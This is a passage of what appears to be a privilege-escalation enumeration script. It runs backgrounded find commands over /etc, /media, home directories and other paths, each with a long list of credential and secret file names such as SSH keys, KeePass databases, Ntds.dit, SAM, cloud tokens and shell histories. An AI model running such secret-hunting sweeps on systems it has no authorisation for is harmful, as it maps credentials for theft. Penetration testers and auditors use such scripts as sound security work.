\"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"*knockd*\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"ssh*config\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name 